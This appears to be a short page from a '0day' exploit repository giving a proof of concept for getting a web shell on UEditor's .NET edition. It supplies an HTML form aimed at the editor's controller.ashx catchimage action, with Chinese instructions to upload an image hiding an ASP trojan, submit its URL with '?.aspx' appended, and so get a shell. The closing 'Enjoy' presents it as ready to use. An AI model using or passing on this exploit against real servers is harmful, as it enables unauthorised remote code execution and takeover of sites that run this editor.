0day/CMS/Ueditor/Ueditor_.net_20180803
2022-02-28 11:45:43 +08:00
..
2022-02-28 11:45:43 +08:00

Ueditor .net GetShell

POC

<form action="http://xxxxxxxxx/controller.ashx?action=catchimage"enctype="application/x-www-form-urlencoded"  method="POST">
<p>shell addr:<input type="text" name="source[]" /></p >
<input type="submit" value="Submit" />
</form>

先上传一张包含asp木马的正常图片之后在shell addr中填入该图片的地址并在末尾加入?.aspx如xxx.jpg?.aspx提交后即可getshell

Enjoy